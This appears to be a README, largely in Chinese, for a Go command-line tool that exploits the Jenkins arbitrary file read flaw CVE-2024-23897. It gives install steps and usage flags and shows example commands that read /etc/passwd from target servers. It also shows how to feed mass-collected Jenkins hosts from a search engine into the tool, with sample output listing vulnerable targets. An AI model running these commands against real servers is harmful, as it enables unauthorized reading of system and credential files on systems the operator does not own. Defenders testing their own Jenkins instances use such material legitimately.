Share
## https://sploitus.com/exploit?id=7B65C393-F43C-5886-A5F4-C76B09C03079
<h4 align="center"> CVE-2024-23897 - Jenkins 任意文件读取 利用工具 </h4>
<p align="center">
<img src="https://img.shields.io/github/go-mod/go-version/wjlin0/CVE-2024-23897?filename=go.mod" alt="">
<a href="https://github.com/wjlin0/CVE-2024-23897/releases/"><img src="https://img.shields.io/github/release/wjlin0/CVE-2024-23897" alt=""></a>
<a href="https://github.com/wjlin0/CVE-2024-23897" ><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/wjlin0/CVE-2024-23897"></a>
<a href="https://github.com/wjlin0/CVE-2024-23897/releases"><img src="https://img.shields.io/github/downloads/wjlin0/CVE-2024-23897/total" alt=""></a>
<a href="https://github.com/wjlin0/CVE-2024-23897"><img src="https://img.shields.io/github/last-commit/wjlin0/CVE-2024-23897" alt=""></a>
<a href="https://wjlin0.com/"><img src="https://img.shields.io/badge/wjlin0-blog-green" alt=""></a>
</p>
# 安装
CVE-2024-23897 需要`go 1.21`才能完成安装 执行以下命令
```shell
go install github.com/wjlin0/CVE-2024-23897/cmd/CVE-2024-23897@latest
```
或者
安装完成的二进制文件在[release](https://github.com/wjlin0/CVE-2024-23897/releases)中下载
- [macOS-arm64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_macOS_arm64.zip)
- [macOS-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_macOS_amd64.zip)
- [linux-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_linux_amd64.zip)
- [windows-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_windows_amd64.zip)
- [windows-386](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_windows_386.zip)
# 使用
```shell
CVE-2024-23897 -help
```
```text
CVE-2024-23897 is a tool for scanning for CVE-2024-23897
Usage:
CVE-2024-23897 [flags]
Flags:
INPUT:
-url, -u string[] URL to scan. (e.g. -u https://example.com)
-list string[] File containing list of URLs to scan. (e.g. -list list.txt)
CONFIG:
-c, -command string[] JinKens Command to run. (e.g. -c 'who-am-i')
-a, -args string[] JinKens Command args.
-e, -exec JinKens Execute command.
-lac, -list-available-commands List available commands.
OUTPUT:
-no-color Don't Use colors in output
DEBUG:
-debug Enable debugging
-p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-version show version of CVE-2024-23897 tool
-header string[] Add custom headers(or on file contents) to the request(e.g. -header 'Cookie: username=admin' or -header header.txt)
-no-stdin disable stdin processing
LIMIT:
-timeout int time to wait in seconds before timeout (default 10)
-t, -thread int Number of concurrent threads (default 30)
-rl, -rate-limit int Rate limit for enumeration speed (n req/sec) (default -1)
UPDATE:
-update Update tool
-duc, -disable-update-check Disable update check
Examples:
Run CVE-2024-23897 check vulnerability on a single targets
$ CVE-2024-23897 -url https://example.com
Run CVE-2024-23897 check vulnerability on list of targets
$ CVE-2024-23897 -list list.txt
Run CVE-2024-23897 read full file contents on a single targets
$ CVE-2024-23897 -url https://example.com -c reload-job -a /etc/passwd
Run CVE-2024-23897 read available commands on a single targets
$ CVE-2024-23897 -url https://example.com -lac
Run CVE-2024-23897 execute the JenKings command
$ CVE-2024-23897 -url https://example.com -c reload-job -a job_name -exec
Run CVE-2024-23897 check vulnerability on a single targets by proxy server
$ CVE-2024-23897 -url https://example.com -proxy http://127.0.0.1:7890
Run CVE-2024-23897 on uncovering Jenkins check vulnerability
$ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
```
use pathScan to collect targets and pass them to CVE-2024-23897 via standard input
```shell
pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
```
> To protect your privacy, I have deleted some outputs
```text
➜ ~ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
_______ ________ ___ ____ ___ __ __ ___ _____ ____ ____ _____
/ ____| | / / ____/ |__ \/ __ |__ \/ // / |__ \|__ /( __ )/ __ /__ /
/ / | | / / __/________/ / / / __/ / // /_________/ / /_ </ __ / /_/ / / /
/ /___ | |/ / /__/_____/ __/ /_/ / __/__ __/_____/ __/___/ / /_/ /\__, / / /
\____/ |___/_____/ /____\____/____/ /_/ /____/____/\____//____/ /_/
Jenkins 任意文件读取漏洞
wjlin0.com
慎用。你要为自己的行为负责
开发者不承担任何责任,也不对任何误用或损坏负责.
[INF] Loaded 50 targets from input
[CVE-2024-23897] https://example.com
Mode: Check Mode
The target is Vulnerable.
please use command and to read file first content.
$ CVE-2024-23897 -u https://example.com -c who-am-i -a /etc/passwd
[CVE-2024-23897] https://example.com
Mode: Check Mode
The target is Vulnerable && This cab read full file contents
please use command and to read full body
$ CVE-2024-23897 -u https://example.com -c connect-node -a /etc/passwd
......
......
......
......
......
[INF] took 92.75 seconds with 13 successful requests
```
# 漏洞分析
> If you want to learn more about the vulnerability details, you can check out phith0n analysis of this vulnerability.
- [Jenkins 任意文件读取漏洞分析](https://www.leavesongs.com/PENETRATION/jenkins-cve-2024-23897.html)